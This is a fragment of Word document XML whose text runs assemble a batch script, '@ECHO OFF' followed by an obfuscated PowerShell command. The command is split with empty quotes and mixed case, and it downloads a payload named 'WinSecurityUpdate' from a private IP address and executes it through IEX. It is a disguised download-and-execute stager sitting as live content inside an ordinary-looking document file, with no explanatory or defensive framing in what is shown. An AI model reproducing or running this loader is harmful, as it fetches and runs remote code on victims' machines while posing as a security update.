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B52F" w14:textId="77777777" w:rsidR="00E622CF" w:rsidRDefault="00E622CF" w:rsidP="00E622CF">
      <w:r>
        <w:t>@ECHO OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD93C91" w14:textId="3DAAC130" w:rsidR="00E622CF" w:rsidRDefault="00E622CF" w:rsidP="00E622CF">
      <w:r>
        <w:t>po""</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sHelL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>""p -c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(New-Object Net.WEbclIent).DoWnLOadstRinG('http://192.168.241.132:8000/WinSecurityUpdate')"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E6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CF"/>
    <w:rsid w:val="00E6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8A333"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0098F176-E850-974C-B68C-CB965E30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919443068860</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>919443068860</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-24T19:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-24T19:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>